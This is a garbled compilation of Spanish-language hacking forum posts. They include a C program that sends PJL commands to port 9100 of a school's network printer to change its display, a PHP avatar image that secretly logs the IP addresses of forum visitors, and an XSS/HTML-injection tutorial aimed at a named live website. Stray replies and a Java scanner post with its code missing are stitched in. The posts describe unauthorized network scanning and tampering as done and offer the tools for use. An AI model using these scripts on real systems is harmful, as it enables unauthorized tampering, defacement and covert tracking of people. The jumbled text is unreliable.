Buenos días/noches, amigos. Hoy les voy a mostrar como, fácilmente, podemos crear una pequeña herramienta que permite de escanear las puertas abiertas de un IP.

El lenguaje en el que lo vamos a escribir nuestro programa/herramienta es JAVA: versátil, fácil y ligero.

Requisitos:
-Mínimo conocimiento de programación
-Plataforma de programación JAVA, ya sea: Eclipse, NetBeans, Notepad++, etc.
-Conocimiento lógico de una conexión.
-Ganas.

Código:

Scanner.java
​

Program.java


Obviamente, si tienen un poquito de imaginación, pueden realizar un programa multi-threading que chequeé todos los IPs de los dispositivos conectados a la red local y de consecuencia escanear sus puertas abiertas.
Espero que les guste.

Hola muchachos, antes inizio diciendo que no hay muchas imagenes y puede que no sea claro, por eso intentare de explicar bien.
Hoy estaba en la escuela conectado a la red wireless, hice un nmap -T Insane -A 192.168.1.0/24, para ver los equipos que estaban conectados a la red y las puertas abiertas.

Bueno, me aparecio questa IP: 192.168.1.27 con il nombre (Lexmark.. bla bla bla), si es una impresora, con muchos ports abiertos y uno de estos era el 9100.

9100    TCP      PDL Data Stream

Buscando buscando y googleando y buscando mas, cai en una pagina donde ensenyaban el PJL (Pritner Job Language), con unos codigos. Estos codigos eran unos comandos que enviados a la impresora habrian hecho algo!
Pense pense y pense, y llegue a la conclusion y me dije:

"Mateo, tu sabes programar en C, haz un programa que te envie ese comando para hacer algo en la impresora no?"

Y me puse a trabajar, el comando que use fue el de cambiar lo que hay escrito en la impresora (en la pantallita).

Llegando a este resultado (Me disculpo por la resolucion pero la hice con el celular y no tenia que verme el profesor)



En italiano "PACCHISSIMO" que se pronuncia "PAKKISSIMO" es una cosa mal hecha o con resultados no buenos.

Ese es el texto ya modificado! A placer obviamente. Ahora les dejo el codigo de mi programita. Pruebenlo y diganme que tal!

//Daxgon
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
 
#define PORT 9100
 
int main (int argc, char *argv[]) {
 
  int sockfd,len,bytes_sent;
  struct hostent *host;
  struct sockaddr_in dest_addr;
  char line[100];
 
  if (argc !=3) {
    printf("\tIl messaggio non puo essere piu lungo di 16 caratteri\n");
    exit(1);
  }
 
  if ( (host=gethostbyname(argv[1])) == NULL) {
    perror("La funzione gethostbyname ha prodotto un errore");
    exit(1);
  }
 
  printf ("Stampanti Hack By: Dax\n");
  printf ("Hostname:   %s\n", argv[1]);
  printf ("Messaggio: %s\n",argv[2]);
 
  dest_addr.sin_family= host->h_addrtype;  
  dest_addr.sin_port= htons(PORT) ;
  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);
 
  bzero(&(dest_addr.sin_zero), 8);
 
  printf ("Socket....\n");
  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("Errore con il socket");
    exit(1);
  }
 
  printf ("Connettendo....\n");
  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("Errore durante la connessione");
    exit(1);}
 
  //Questo è il codice della stampante
 
  strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
  strncat(line,argv[2],44);
  strcat(line,"\"\r\n\033%-12345X\r\n");
 
 
  printf ("Inviando dati...%d\n",strlen(line));
  printf ("Linea: %s\n",line);
  bytes_sent=send(sockfd,line,strlen(line),0);
 
  printf("Inviati %d bytes\n",bytes_sent);
  close(sockfd);
}
 

Les prometo que entro sabado pondre muchas mas imagenes del nmap, asi entenderan mejor!

Si tienen dudas escribanme!

Big Up!

PS. Ahora estoy trabajando en un programa que me controla la impresora desde el computer. Pudiendo manejar todo lo que es posible. Quando este acabado y funcione lo dejare libre

Ah si, los codigos son estos por si no habian entendido.

Ec%-12345X@PJL RDYMSG DISPLAY="MESSAGE"
Ec%-12345X

Para compilar en Linux:

gcc -o nombredelarchivofinal nombredelarchivoenc.c

Y para ejecutar tenes que pasarle 2 argumentos. La IP local de la impresora y el mensaje ES:

./hackdisplay 192.168.1.27 "Este mensaje se vedra en la pantalla"

Lo se ._. XDDD

Pero no hace mucho que estoy estudiando php y estoy haciendo este tipo de cosas...

Bueno blockar tema porqe estaba posteado...

O__O Lo has posteado por caso?

Para verlo

Hola amigos de ElHacker.net

Curiosiando, descubri esto...

<?php
Header("Content-type: image/png");
$im = ImageCreate(300, 300);
$red = ImageColorAllocate($im, 255, 0, 0);
$white = ImageColorAllocate($im, 255, 255, 255);
$blue = ImageColorAllocate($im, 0, 0, 255);
$black = ImageColorAllocate($im, 0, 0, 0);
ImageFill($im, 0, 0, $red);
ImageString($im, 10, 10, 10, "Hola elhacker.net", $black);
$font_width = ImageFontWidth(10);
$string_width = $font_width * (strlen("Hola! elhacker.net"));
ImageLine($im, 100, 50, (100+$string_width), 50, $black);
ImagePng($im);
$nombre_archivo = 'logs.txt';
if($_SERVER["HTTP_X_FORWARDED_FOR"]){
$contenido = $_SERVER["HTTP_X_FORWARDED_FOR"]."<br/>";
}else{
$contenido = $_SERVER["REMOTE_ADDR"]."<br/>";
}
 
if (is_writable($nombre_archivo)) {
 
    if (!$gestor = fopen($nombre_archivo, 'a')) {
         echo "Error";
         exit;
    }
 
    if (fwrite($gestor, $contenido) === FALSE) {
        echo "Error";
        exit;
    }
 
    echo "Exito";
 
    fclose($gestor);
 
} else {
    echo "Error";
}
?>

Lo guardamos con el nombre imagen.php puedes otro si quieres +
y obviamente creamos el log que se llame "logs.txt" que no contenga nada...
los subimos al servidor preferiblemente que sea de ustedes y editamos los permisos del archivo log a 777.
Ahora vamos al foro que sera por decirlo "victima" aunque no tiene nada que ver porque la IP no sirve... y vamos a Editar Perfil y elejis la opcion Subir por link, y ponemos
http://tu-nombre-web.com/imagen.php
si la haz guardado en otro directorio asegurate de ponerlo bien
Y ya esta hecho!, cada vez que hagas un post veras su IP, o cuando entren a tu perfil!

Saludos!!!!!!!!!!!!!!

Muchisimas gracias

Bno man no entendi mucho, Cuando puedas me ayudas arreglando el code

Graicas =

Lo siento, Hay tengo una nueva duda con el mismo SCRIPT

Porfavor ayuda XD

Bueno el codigo no funciona bien
EJ:
Escriban esto :WXYZABCDEFGHIJKLMNOPQRSTUV
les deberia salir: ABCDEFGHIJKLMNOPQRSTUVWXYZ
PEro no lo que imprime es: STUVSTUVABCDEFGHIJKLMNOPQR

Ayuda plz

Codigo

Tonces...

IV Capítulo | "Styleando" a la manera de DaXGoN

Bueno dejemnos unas cositas claras , primero xD la página a la que realizaremos los "ataques" es: www.juegaconmigo.webcindario.com

Con los style se puede poner una imagen, texto, div, table. en el lugar que te plasca.
Si saben usarlo pueden dejar TODA la página en blanco y solo el resultado de busqueda. xD
"Disablear", parte de la página.
Y muchas cosas....

---

Una cosa, no vamos a usar la etiqueta <style> lo vamos a hacer de otra forma... Ejemplo:
<div style="position: absolute; top:18px; left:0px; width: 800px; height: 600px; overflow: visible; ">Código</div> así es más entendible, logramos no confundirnos tanto. Bueno si sabemos lo minimo de CSS podemos entender ese código que es un poco simple.

Ahora vamos a la accion, primero pondremos este código en la página:
<div><img src="http://www.dragonjar.org/wp-content/themes/dragonjar/pix/hdrs/header.jpg" /></div>

Pues si no tiene caso porque, la imagen no se visualiza con su verdadero tamaño y si la queremos en otro lugar no podremos porque es un simple <div>, e imagen, sin estilo(s), ahora utilizaremos el codigo anterior pero agregandole el siguiente estilo, el código será:
<div style="background: url('http://www.dragonjar.org/wp-content/themes/dragonjar/pix/hdrs/header.jpg'); position: absolute; top:34px; left:78px; width: 966px; height: 128px; "></div> Entereamos!

Y analizemos el código...

"stlye" Declara que apartir de ahí hasta que se cierre la etiqueta se cumpla los estilos que están escritos dentro de style=...
"background" Declara el fondo que se va a usar en el div.
"position:absolute;" Hace que se cumpla el top y left.
"top" El espacio que se desea usar verticalmente.
"left" El espacio que se desea usar horizontalmente.
"width" Ancho de el estilo
"height" Largo de el estilo

Ok ahora vamos a poner el ejemplo que dije antes, de poner toda la web en blanco y con una simple linea de texto, para eso usaremos un fondo blanco (encima de todo) reproduciendolo en toda la página,  y un linea de texto dentro de un div, el código es el siguiente:

<div onmouseover:alert(34); style="background: url('http://fotos.subefotos.com/8609b302154ffc7ac72899acb34ddaf6o.jpg'); position:absolute; overflow: visible;  width:1278px; height:614px; top:0px; left:0px; "><font size=4px face=Verdana><p>Solo se ve esta linea de texto YUPI! Funciono</p></font></div>

Y así en adelante. podremos editar la web a gusto

Bueno lo demás ya es cosa suya no les voy a enseñar CSS ¬¬, ahora pueden probar con más webs vulnerables e invetar nuevos trucos xD.

Bueno! todo tiene su fin y aquí termina el tutorial de XSS. Gracias por leerlo! Y disfrutad de el!

By: DaXGoN

Cualquier aporte es bienvenido, criticas, correciones, trucos, etc.

---

Aquí unos truquillos

(Hace editable la web)

---

Y así me despido que les sea útil

/off